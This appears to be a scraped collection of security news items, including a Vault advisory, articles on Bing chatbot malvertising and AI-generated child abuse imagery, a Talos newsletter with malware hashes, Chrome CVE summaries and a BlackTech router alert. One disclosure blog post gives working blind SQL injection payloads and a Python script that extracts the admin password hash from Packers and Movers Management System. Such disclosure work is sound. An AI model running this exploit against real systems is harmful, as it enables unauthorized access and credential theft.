The Vault and Vault Enterprise ("Vault") Google Cloud secrets engine did not preserve existing Google Cloud IAM Conditions upon creating or updating rolesets. Fixed in Vault 1.13.0.

**Hashicorp Vault Incorrect Permission Assignment for Critical Resource vulnerability**

High severity GitHub Reviewed Published Sep 29, 2023 to the GitHub Advisory Database • Updated Sep 29, 2023

GHSA-86c6-3g63-5w64: Hashicorp Vault Incorrect Permission Assignment for Critical Resource vulnerability

CVE-2023-5077: HCSEC-2023-30 - Vault’s Google Cloud Secrets Engine Removed Existing IAM Conditions When Creating / Updating Rolesets

By Waqas
Is it really necessary to display advertisements within an AI chatbot?
This is a post from HackRead.com Read the original post: Malicious Ads Infiltrate Bing AI Chatbot in Malvertising Attack

The Bing AI chatbot labeled the malicious website as the official website of an IP scanner provider and recommended users to visit it, despite its involvement in the malvertising attack campaign.

In the wake of OpenAI’s ChatGPT‘s soaring success, Microsoft’s Bing AI Chatbot emerged as a challenging player in the world of artificial intelligence, boasting over 100 million active users. While this achievement underscores the growing influence of AI, it has also attracted the attention of cybercriminals seeking to exploit this massive user base.

Recent revelations indicate that Bing AI has become the latest target of malvertising attacks, raising significant concerns within the cybersecurity community.

In a blog post, Jérôme Segura, a senior security researcher at Malwarebytes Labs, shed light on the alarming exploitation of Bing AI Chatbot by malicious actors. The attackers have cleverly embedded malicious advertisements within the chatbot, representing a novel approach to malvertising.

It’s crucial to note that the advertising mechanism within Bing AI Chatbot operates similarly to conventional search results, where advertisers bid on specific keywords to have their ads displayed to users conducting related searches. However, there are noteworthy distinctions in how these ads manifest within chatbots.

The attack unveiled by Malwarebytes involved cybercriminals masquerading as the Advanced IP Scanner provider to lure users into clicking on their malicious ads. Advanced IP Scanner is a tool commonly used by network administrators, hinting at the possibility that the culprits behind this campaign may be specifically targeting IT and cybersecurity professionals, although this remains unconfirmed.

In a screenshot shared by Segura, the top ad slot prominently features a website address **(mynetfoldersipcfd)**, claiming to be the official source for downloading Advanced IP Scanner. To make things worse for unsuspecting users, Bing AI itself promoted this malicious website as the legitimate destination.

The true intent behind mynetfoldersipcfd is to segregate genuine victims from bots, sandboxes, or security researchers. It accomplishes this by scrutinizing various factors, including users’ IP addresses, time zones, and system settings, such as web rendering preferences that identify virtual machines.

Human users are redirected to a deceptive site **(advenced-ip-scannercom)**, mimicking the official platform. Meanwhile, other unsuspecting visitors are rerouted to a decoy page. The subsequent step involves duping users into downloading and installing a fake malicious version of Advanced IP Scanner, facilitating the theft of user data. It is crucial to emphasize that the official website for downloading Advanced IP Scanner is advanced-ip-scanner.com, not **(advenced-ip-scannercom)**.

The difference between the two sites is the use of **_a_** and **_e_** in their addresses: adv**_a_**nced-ip-scanner.com and (adv**_e_**nced-ip-scannercom). This is a typical case of Typosquatting. **Typosquatting** is a type of attack that involves registering domain names that are similar to popular websites but with common misspellings.

The malvertising campaign doesn’t stop here. Segura also flagged another malicious ad served through Bing AI Chatbot, where the same threat actor replicated Mycase.com, a US-based cloud legal practice management software solution. Mycase.com is instrumental in aiding attorneys and law firms in managing cases, clients, and communications.

Bing AI chatbot pushing Malvertising campaign (Image: Malwarebytes)

This incident emphasised the importance of exercising extreme caution when encountering ads within chatbots and search engines. Although malvertising attacks are not novel, their execution through an AI chatbot platform is definitely an unsettling development.

To safeguard against such threats, it is advisable to employ updated anti-malware solutions, leverage browser scanning applications or plugins, and stay vigilant by keeping software and systems up-to-date. In an era of evolving cybersecurity challenges, these precautions are essential to protect against the ever-creative tactics of cybercriminals.

****RELATED ARTICLES****

1.  Google Indexed Bard AI User Chats in Search Results
2.  New AI tool aims to make CAPTCHA a thing of the past
3.  AI Image Editing Tool Cutout Leaked User Images and Data
4.  Following WormGPT, FraudGPT Emerges for AI-Driven Cyber Crime

Malicious Ads Infiltrate Bing AI Chatbot in Malvertising Attack

By Waqas
This was revealed by the Internet Watch Foundation, a UK-based internet watchdog.
This is a post from HackRead.com Read the original post: Dark Web Pedophiles Using Open-Source AI to Generate CSAM

Pro tip: Do not upload images of your children on the internet, including your social media profile, even if your friends list consists of people you know or trust.

****RELATED ARTICLES****

*   **The availability and sophistication of generative AI platforms is a growing issue of concern. Cybercriminals can easily manipulate videos, images, and audio to create deep fake content.**

*   **A UK-based internet watchdog has shared startling details of how paedophiles have switched to generative AI to create child sexual abuse content.**

*   **Research revealed that paedophiles use freely available AI software to create illegal child pornographic material.**

*   **The Internet Watch Foundation observed that paedophiles are openly discussing how to modify the software to manipulate children’s photographs on the dark web.**

*   **This can make it challenging to help real-life victims.**

We all know OpenAI’s **ChatGPT** chatbot. You may also be aware that cybercriminals have developed malicious alternatives of ChatGPT known in the cybersecurity community as **FraudGPT and WormGPT**. The bottom line is that cybercriminals will go to great lengths to turn the power of Artificial Intelligence (AI) to their advantage for malicious purposes.

Now, according to a **report** published by a UK-based internet watchdog, the Internet Watch Foundation (IWF), cybercriminals are turning to generative AI platforms to create child sexual abuse material (CSAM).

As per the research from IWF, cybercriminals’ increasing preference to create deep fake content fabricating people or events is a concerning issue because of the sheer scope of damage it can cause. The problem becomes more concerning when it involves minors, particularly children. The ease with which sex offenders can create this imagery can also encourage its widespread acceptability.

The IWF found that there’s been a sudden surge in AI-generated child sexual abuse content available online. The organization noticed discussions among paedophile rings on dark web forums frequently used by sex offenders regarding tips on creating fake images of children via open-source AI models.

Child safety experts and law enforcement agencies are afraid that the availability of realistic photos will make it challenging to help real-life victims of child sexual abuse. It must be noted that creating photorealistic content is illegal in the UK.

Open-source AI models differ from closed AI models like Google’s Imagen, as anyone can download them. It is easier to use these models because they can download and run them on PCs, and there’s no need to run them on the cloud. So, they can evade the controls and detection tools on the cloud and distribute the content online more regularly than they do now.

Offenders can use a basic source image-generating model containing billions of tagged images and fine-tune the images with child sexual abuse images to create a similar model with low-rank adaptation. Hence, with minimal computation, they can produce realistic images and mislead law enforcement by diverting their focus on child victims that don’t exist.

**Earlier**, the IWF’s chief executive, Susie Hargreaves OBE, had warned the government regarding the seriousness of this issue. 

In May 2023, the Internet Watch Foundation (IWF) initiated the recording of instances involving AI-generated child sexual abuse material, marking a significant development for its hotline. Over the span of May 24 to June 30, the IWF diligently investigated 29 reports encompassing URLs suspected of housing AI-generated child sexual abuse imagery. These reports came from concerned members of the public.

Among these cases, the IWF successfully verified that seven of the reported URLs indeed contained AI-generated child sexual abuse imagery. Notably, these URLs often hosted multiple images, which could be entirely AI-generated or a combination of AI-generated and authentic content.

Disturbingly, the addressed URLs covered a distressing range of material, spanning from Category A to Category B, and depicted children as young as 3 to 6 years old, comprising both female and male victims.

“We are not currently seeing these images in huge numbers, but it is clear to us the potential exists for criminals to produce unprecedented quantities of life-like child sexual abuse imagery. This would be potentially devastating for internet safety and for the safety of children online. We have a chance, now, to get ahead of this emerging technology, but legislation needs to be taking this into account and must be fit for purpose in the light of this new threat,” Hargreaves had said.

The head of the UK government’s AI task force, Ian Hogarth, had raised red flags about child sexual abuse material created using open-source AI models, claiming that it was amongst the “most heinous things out there.”

The IWF **chief** Dan Sexton regarded this as a “public health epidemic” that will get only worse as cybercriminals switch their focus on generative AI technology.

The IWF is a non-profit organization founded in 1996 to monitor the internet for sexual abuse content and receive tips about such content, especially involving children.

****How to Protect your Child and their Photos from Malicious Elements on Dark Web?****

Here are 10 ways parents can protect their children and their photos from exposure to the dark web and individuals with malicious intent:

1.  **Educate Your Children**: Teach your kids about online safety, including the importance of not sharing personal information, photos, or engaging with strangers online.
2.  **Use Privacy Settings**: Adjust the privacy settings on social media platforms to ensure that only trusted contacts can view your child’s content.
3.  **Regularly Check Friend Lists**: Encourage your child to regularly review their friend lists and followers on social media and remove anyone they don’t know in real life.
4.  **Watermark Photos**: If you choose to share photos of your children online, consider watermarking them to deter unauthorized use.
5.  **Limit Location Sharing**: Disable location sharing on your child’s devices and social media accounts to prevent tracking by malicious individuals.
6.  **Use Secure Devices**: Ensure your child’s devices have up-to-date security software and are protected with strong passwords or biometrics.
7.  **Teach Responsible Posting**: Encourage responsible posting by discussing the potential consequences of oversharing personal information or photos.
8.  **Monitor Online Activity**: Keep an eye on your child’s online activity without being overly invasive. Use parental control software if necessary. **Use parental control apps**!
9.  **Promote Open Communication**: Create an environment where your child feels comfortable discussing any online interactions or concerns they may have.
10.  **Report Suspicious Activity**: Teach your child how to recognize and report suspicious behavior or content to both you and the relevant authorities.

****RELATED ARTICLES****

1.  Hackers Claiming to Jailbreak AI Chatbots to Write Phishing Emails
2.  Microsoft’s new tool detects & reports pedophiles from online chats
3.  Fake ChatGPT and AI pages on Facebook are spreading infostealers
4.  Operation Narsil – INTERPOL Busts Decade-Old Child Abuse Network

Dark Web Pedophiles Using Open-Source AI to Generate CSAM

Two notable vulnerabilities in Google Chrome should be patched asap, and an allegedly new ransomware-as-a-service group.

Thursday, September 28, 2023 14:09

Welcome to this week’s edition of the Threat Source newsletter.

Since Elon Musk first started talking about purchasing Twitter/X around this time last year, one of his main sticking points has been how many bot accounts are on the platform and how that potentially affects advertising revenue and user counts.

In the latest advancement in the alleged fight against bots, X recently launched a government ID-based authentication process available to its paid premium users. The social media platform is partnering with a third-party security company to provide advanced, faster support to make it more difficult for others to impersonate the user.

The setup process says it involves the user taking a picture with their computer’s camera with their government-issued ID. According to X’s Verification Policy, the third-party company only keeps the provided picture for as long as it takes to verify the provided information, and any ID images are only kept for 72 hours. The information derived from the submitted pictures is stored for 30 days by the third party in the name of providing users “an opportunity to appeal a verification decision and for X to review your appeal.”

Meta, Facebook and Instagram’s parent company, has been rolling out a similar program called Meta Verified that also asks users to submit photos of a government ID and pay a subscription fee to receive “account verification with impersonation protections and access to increased visibility and support.”

Taken at face value, X and Meta’s retention policies for these provided images of IDs seem fine. The main issue for me is I don’t really see what the concrete benefits here are.

On X, submitting the ID information and paying for the premium subscription only says it provides faster support, and an additional verification badge on a user’s account along with the now-infamous blue checkmark. The option is not available to business or organizational accounts, which seems like it’d be the space most ripe for impersonation — I’ve certainly observed my fair share of Talos-impersonated accounts on that platform where someone tried passing as our organization.

X is also saying it will only look into future benefits for this verification program, which “may explore additional measures, such as ensuring users have access to age-appropriate content and protecting against spam and malicious accounts.” The service still isn’t offered in the EU and U.K., either, presumably because of the stricter data privacy laws in those regions.

When these verification procedures are in place, there’s no guarantee they work, either. My sister-in-law had her Instagram/Meta account taken over by a cryptocurrency spammer last year, and even when she submitted a 360-degree selfie and images of her government-issued ID to Instagram, they denied her claim that her account was hacked, and to this day it’s still sending cryptocurrency spam to her family members even though she’s created a new account. Her appeal was not accepted by the company, either.

That’s one very specific case, I know, but if I’m going to start sending these companies with dubious security histories pictures of my driver’s license, I’m going to need a bit more than promises of future features and vague support promises before I’m sold on this method of multi-factor authentication.

**The one big thing**

Google Chrome users should update their browsers as soon as possible after the company disclosed multiple, serious vulnerabilities. Google initially disclosed CVE-2023-4863 as a heap buffer overflow in the WebP image format in Chrome. However, on Wednesday, it released a new advisory with CVE-2023-5129 identifying that the vulnerability actually existed in libwebp, meaning it affects multiple applications and not just Chrome. The updated advisory also elevated the severity score to a maximum 10 out of 10. This week, Talos also disclosed CVE-2023-3421, a use-after-free vulnerability that affects Chrome. An attacker could exploit this vulnerability by tricking the target into visiting a specially crafted HTML web page.

**Why do I care?**

Chrome is a very popular web browser, and its Chromium open-source version serves as the basis for many other browsing software. The fact that critical WebP vulnerability is particularly notable because WebP is the new default file format that most images use when  processed in Chrome. According to the advisory, “With a specially crafted WebP lossless file, libwebp may write data out of bounds to the heap,” if an attacker exploits CVE-2023-5129.

**So now what?**

The advice here is pretty simple — update your Google Chrome if you haven’t already!

**Top security headlines of the week**

**MGM casinos went back online last week after 10 days** due to a ransomware attack. The company’s casinos and hotels were able to fix all issues pertaining to guest services and the electronic slot machines that had been taken down due to the attack. One estimate suggests the outage may have cost the company upward of $80 million. The Scattered Spider threat actor is taking credit for the attack, partnering with known ransomware magnate ALPHV. Security researchers believe Scattered Spider is actually a hacking group that calls itself Star Fraud. New research presented at LABScon last week also stated that the group infiltrated MGM and Caesars, another casino manager, after gaining access to Okta authentication servers. (Washington Post, Associated Press)

**A hacking group claims to have breached “all of Sony \[SIC\] Systems”** and is reportedly selling stolen data on the dark web. A new group called Ransomed.vc is taking credit for the alleged attack and says it accessed more than 6,000 files from the tech giant known for producing the PlayStation video game console. Sony says it is still investigating the group’s claims. Despite the name, Ransomed.vc is actually an extortion group and does not have its own encryptor. Instead, it plans to sell the data on the dark web for $2.5 million. However, other threat actors have since stepped up to also take credit for the attack, leaving exact attribution in doubt. Another threat actor calling themselves MajorNelson says they “leaked for free" a 2.4 GB compressed archive that contains 3.14 GB of uncompressed data it claims belongs to Sony. (Bleeping Computer, Kotaku)

**A new ransomware-as-a-service syndicate ShadowSyndicate is reportedly operating a massive network of servers** that’s connected to other large ransomware families. Security researchers say the group has potential ties to the ALPHV ransomware group and other ransomware families like Clop, Play, Royal and Cactus. A new report outlines dozens of systems that ShadowSyndicate controls, including 52 containing the group’s secure shell (SSH) fingerprint it uses as Cobalt Strike beacons to manage and coordinate its various malware campaigns. It’s currently unclear if ShadowSyndicate is truly a ransomware-as-a-service group or more of an initial access broker. (DarkReading, SC Magazine)

**Can’t get enough Talos?**

*   Talos Takes Ep. #155: How Talos helped defend BlackHat's network in Vegas
*   Beers with Talos Ep. #139: Who is Jacques Wagon?
*   Decipher Security Podcast Source Code 9/22
*   ICS protocol coverage using Snort 3 service inspectors
*   10 new vulnerabilities disclosed by Talos, including use-after-free issue in Google Chrome

**Upcoming events where you can find Talos**

**Grace Hopper Celebration** **(Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

> _Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking._

**misecCON** **(Nov. 17)**

Lansing, Michigan

> _Terryn Valikodath from Talos Incident Response will deliver a talk providing advice on the best ways to conduct analysis, learning from his years of experience (and mishaps). He will speak about the everyday tasks he and his Talos IR teammates must go through to properly perform analysis. This talk covers topics such as planning, finding evil, recording findings, correlation and creating your own timelines._

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** e2cdf48bc6741afd7aba54d7c0b30401d2d6dd06138979ca73f3167915bf22b3  
**MD5:** eba4ad9540713d5956ab0b6a566c1487  
**Typical Filename:** webnavigatorbrowser.exe  
**Claimed Product:** WebNavigatorBrowser  
**Detection Name:** Win64:WebNav.26k0.rlsync.Talos

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647  
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790  
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::1201

**SHA 256:** 7f66d4580871e3ee6a35c8fef6da7ab26a93ba36b80279625328aaf184435efa  
**MD5:** e9a6b1346d1a2447cabb980f3cc5dd27  
**Typical Filename:** профиль 10 класс.exe  
**Claimed Product:** N/A  
**Detection Name:** Application\_Blocker

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

The security pitfalls of social media sites offering ID-based authentication

Sourcecodester Packers and Movers Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /inquiries/view_inquiry.php.

Sep 1, 2023 - 5 ' read reflections, tutorials

After passing my OSWE in March and dealing with some long neglected life issues, I decided to put my skills to the test and hunt for a CVE. It felt like a rite of passage for OSWE passers.

**Recon**

My first approach was to find projects written in languages that are easy to make mistakes in but that are also very popular. PHP is the prime candidate here, so I looked up php open source projects on google and quickly discovered sourcecodetester.com among the first results.

I started perusing through random projects and downloading them locally to run them. This approach netted me a substantial number of critical findings, but whenever I wanted to report them to MITRE, I would find out that they were already assigned a CVE. Nonetheless, it was a nice confidence booster that I was able to find those vulnerabilities so easily.

This meant I had to up my game a bit. I had to look for projects that were at least somewhat secure. After a more careful analysis, I found the Packers and Movers Management system

What caught my attention on this project was that the admin pages called in a header function that itself was checking for session.

This was good news, it meant that whoever designed this took some authorization considerations into account.

**Exploit Discovery**

I took a shortcut here, and instead of following user input paths like I normally do, I went straight to the source code and searched for “query” in an attempt to grab an easy win.

I found some results, but they were all behind the dreaded admin login, which would drastically reduce the impact of those findings.

However, upon a closer inpection, I quickly realized that the header function was only used for the direct subpages of /admin, but would often not be used deeper into the application.

As an example, /admin/index.php uses the header, but /admin/inquiries/view\_inquiry.php does not and also uses an unsanitized query right at the start of the file!

I was able to locate this particular piece of code in the application.

This meant that any input after the id parameter would pass unfiltered through these 2 lines:

        $conn->query("UPDATE `inquiry_list` set `status` = 1 where id = '{$_GET['id']}'");
        $qry = $conn->query("SELECT **  from `inquiry_list` where id = '{$_GET['id']}'");
    

Since view\_inquiry.php does not use the session header, it means that we can attack the id parameter without any need for authentication.

Let’s test it with a classic SLEEP payload:

    GET /mpms/admin/?page=inquiries/view_inquiry&id=4'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))test)--+
    

Looking at the response time, we can see it took just over 8 seconds, which happens because the id parameter is passed through two querries. That confirms our Blind SQL Injection.

Let’s experiment with some more payloads and look if there are any differences in the content length.

    GET /mpms/admin/?page=inquiries/view_inquiry&id=4'+AND+(ascii(substring((SELECT+password+FROM+mpms_db.users+WHERE+id=1+LIMIT
    +1),1,1))=48)--+ 
    GET /mpms/admin/?page=inquiries/view_inquiry&id=4'+AND+(ascii(substring((SELECT+password+FROM+mpms_db.users+WHERE+id=1+LIMIT
    +1),1,1))=47)--+ 
    

 

It does look like we get different content lengths when the query fails to execute. This means we can start working on an exploit right away.

**The Exploit**

The exploit is actually surprisingly simple. I ended up pruning the GET request of all uneccessary headers to get the request size down, wrote a for loop for the Blind SQL Injection and then a get\_token function to store the token. Here it is:

    import requests
    
    session = requests.session()
    
    expected_size = 26845
    
    def get_char(session, pos):
        for char in range(32, 126):
            sql_payload = f'\' AND (ascii(substring((SELECT password FROM mpms_db.users WHERE id=1 LIMIT 1),{pos},1))={char})-- '
            r = session.get('http://localhost:80/mpms/admin/?page=inquiries/view_inquiry&id=4' + sql_payload)
            #print(len(r.content))
            if len(r.content) == expected_size:
                return chr(char)
        print('Error at ' + str(char))
        exit()
    
    def get_token(session):
        token = ""
        for pos in range(1, 33):
            token += get_char(session, pos)
        print("The Full MD5 password is " + str(token))    
        return token
    
    get_token(session)
    

All that preparation for 25 lines of code. Let’s run it and wait a few seconds:

We now have our MD5 password. Passing it through an online hash cracker, we get the password admin123:

Which is exactly the password used in the source page:

**The Report**

With those proofs in hand, I used the CVE MITRE website to complete the form and report the CVE via https://www.cve.org/ReportRequest/ReportRequestForNonCNAs.

After about a month, I received my CVE ID, CVE-2023-30415

I have emailed sourcecodester.com with a detailed explanation of the exploit and the proof of concept. Considerably way over 90 days have passed since, so this is me making it public as according to the reasonable disclosure procedure.

Overall, I had a lot of fun finding my first CVE, as trivial as it was. It helped me developed my own confidence and ability to quickly scan code repos for common mistakes. I have been busy with other interests lately but I have managed to secure a decent amount of AppSec and code review engagements at work, so I have been doing my best to keep learning and hone my skills even if I am not actively hunting for CVEs. I would recommend any aspiring AppSec hacker to have a go at it, even if you don’t manage to secure a CVE, just finding some vulnerabilities will do wonders for your confidence.

Before I go, here is a more updated version of the exploit:

    import requests
    import sys
    
    session = requests.session()
    
    expected_size = 26845
    
    if len(sys.argv) < 2:
        print("Usage: python exploit.py <URL>")
        sys.exit(1)
    
    url = sys.argv[1]
    
    def get_char(session, pos):
        for char in range(32, 126):
            sql_payload = f'\' AND (ascii(substring((SELECT password FROM mpms_db.users WHERE id=1 LIMIT 1),{pos},1))={char})-- '
            r = session.get(url + '/mpms/admin/?page=inquiries/view_inquiry&id=4' + sql_payload)
            #print(len(r.content))
            if len(r.content) == expected_size:
                return chr(char)
        print('Error at ' + str(char))
        exit()
    
    def get_token(session):
        token = ""
        for pos in range(1, 33):
            token += get_char(session, pos)
        print("The Full MD5 password is " + str(token))    
        return token
    
    get_token(session)

CVE-2023-30415: Getting my first CVE

Use after free in Passwords in Google Chrome prior to 117.0.5938.132 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via crafted UI interaction. (Chromium security severity: High)

CVE-2023-5186

Use after free in Extensions in Google Chrome prior to 117.0.5938.132 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-5187

Heap buffer overflow in vp8 encoding in libvpx in Google Chrome prior to 117.0.5938.132 and libvpx 1.13.1 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-5217

Cybersecurity agencies from Japan and the U.S. have warned of attacks mounted by a state-backed hacking group from China to stealthily tamper with branch routers and use them as jumping-off points to access the networks of various companies in the two countries.
The attacks have been tied to a malicious cyber actor dubbed BlackTech by the U.S. National Security Agency (NSA), Federal Bureau of

Cybersecurity agencies from Japan and the U.S. have warned of attacks mounted by a state-backed hacking group from China to stealthily tamper with branch routers and use them as jumping-off points to access the networks of various companies in the two countries.

The attacks have been tied to a malicious cyber actor dubbed **BlackTech** by the U.S. National Security Agency (NSA), Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Japan National Police Agency (NPA), and the Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC).

"BlackTech has demonstrated capabilities in modifying router firmware without detection and exploiting routers' domain-trust relationships to pivot from international subsidiaries to headquarters in Japan and the United States, which are the primary targets," the agencies said in a joint alert.

Targeted sectors encompass government, industrial, technology, media, electronics, and telecommunication sectors, as well as entities that support the militaries of the U.S. and Japan.

BlackTech, also called by the names Circuit Panda, HUAPI, Manga Taurus, Palmerworm, Red Djinn, and Temp.Overboard, has a history of operating against targets in East Asia, specifically Taiwan, Japan, and Hong Kong at least since 2007.

Trend Micro, in December 2015, described the threat actor as well-funded and organized, striking key industry verticals – namely government, consumer electronics, computer, healthcare, and finance – located in the region.

It has since been attributed to a wide range of backdoors such as BendyBear, BIFROSE (aka Bifrost), Consock, KIVARS, PLEAD, TSCookie (aka FakeDead), XBOW, and Waterbear (aka DBGPRINT). PLEAD campaigns documented by the cybersecurity firm in June 2017 have entailed the exploitation of vulnerable routers for use as command-and-control (C&C) servers.

"PLEAD actors use a router scanner tool to scan for vulnerable routers, after which the attackers will enable the router's VPN feature then register a machine as virtual server," Trend Micro noted at the time. "This virtual server will be used either as a C&C server or an HTTP server that delivers PLEAD malware to their targets."

Typical attack chains orchestrated by the threat actor involve sending spear-phishing emails with backdoor-laden attachments to deploy malware designed to harvest sensitive data, including a downloader called Flagpro and backdoor known as BTSDoor, PwC disclosed in October 2021, noting "router exploitation is a core part of TTPs for BlackTech."

Earlier this July, Google-owned Mandiant highlighted Chinese threat groups' "targeting of routers and other methods to relay and disguise attacker traffic both outside and inside victim networks."

The threat intelligence company further linked BlackTech to a malware named EYEWELL that's primarily delivered to Taiwanese government and technology targets and which "contains a passive proxy capability that can be used to relay traffic from other systems infected with EYEWELL within a victim environment."

The extensive set of tools points to a highly-resourceful hacking crew boasting of an ever-evolving malware toolset and exploitation efforts to sidestep detection and stay under the radar for lengthy periods by taking advantage of stolen code-signing certificates and other living-off-the-land (LotL) techniques.

UPCOMING WEBINAR

Fight AI with AI — Battling Cyber Threats with Next-Gen AI Tools

Ready to tackle new AI-driven cybersecurity challenges? Join our insightful webinar with Zscaler to address the growing threat of generative AI in cybersecurity.

Supercharge Your Skills

In its latest advisory, CISA et al called out the threat actor for possessing capabilities to develop customized malware and tailored persistence mechanisms for infiltrating edge devices, often modifying the firmware to maintain persistence, proxying traffic, blending in with corporate network traffic, and pivoting to other victims on the same network.

Put differently, the rogue modifications to the firmware incorporate a built-in SSH backdoor that allows the operators to maintain covert access to the router by making use of magic packets to activate or deactivate the function.

"BlackTech actors have compromised several Cisco routers using variations of a customized firmware backdoor," the agencies said. "The backdoor functionality is enabled and disabled through specially crafted TCP or UDP packets. This TTP is not solely limited to Cisco routers, and similar techniques could be used to enable backdoors in other network equipment."

Cisco, in its own bulletin, said the most prevalent initial access vector in these attacks concerns stolen or weak administrative credentials and that there is no evidence of active exploitation of any security flaws in its software.

"Certain configuration changes, such as disabling logging and downloading firmware, require administrative credentials," the company said. "Attackers used compromised credentials to perform administrative-level configuration and software changes."

As mitigations, it's recommended that network defenders monitor network devices for unauthorized downloads of bootloaders and firmware images and reboots and be on the lookout for anomalous traffic destined to the router, including SSH.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google